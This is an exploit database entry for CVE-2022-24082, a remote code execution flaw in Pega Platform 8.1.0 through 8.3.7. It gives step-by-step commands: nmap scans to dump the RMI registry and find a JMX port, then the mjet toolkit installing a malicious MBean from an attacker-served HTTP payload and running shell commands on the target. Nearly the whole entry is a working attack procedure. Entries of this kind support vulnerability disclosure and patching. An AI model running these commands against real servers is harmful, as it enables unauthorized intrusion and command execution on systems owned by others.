Pega Platform 8.1.0 - Remote Code Execution (RCE)

Author: Marcin Wolak
type: webapps
platform: multiple
port: 
date_added: 2023-03-28  
date_updated: 2023-03-28  
verified: 0  
codes: CVE-2022-24082  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 51099.txt  

# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 20 Oct 2022
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
# Vendor Homepage: www.pega.com
# Software Link: Not Available
# Version: 8.1.0 on-premise and higher, up to 8.3.7
# Tested on: Red Hat Enterprise 7
# CVE : CVE-2022-24082

;Dumping RMI registry:
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>

;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1
:<PORT>)
;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI
dump, but actually listens on the network as well):
nmap -sT -sV -p <PORT> <IP Address>

;Exploitation requires:
;- JVM
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
;- jython
;Installing mbean for remote code execution
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
Address> 9999 install random_password http://<Local IP to Serve Payload
over HTTP>:6666 6666

;Execution of commands id & ifconfig
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
Address> 9999 command random_password "id;ifconfig"

;More details:
https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316


Kind Regards,
Marcin Wolak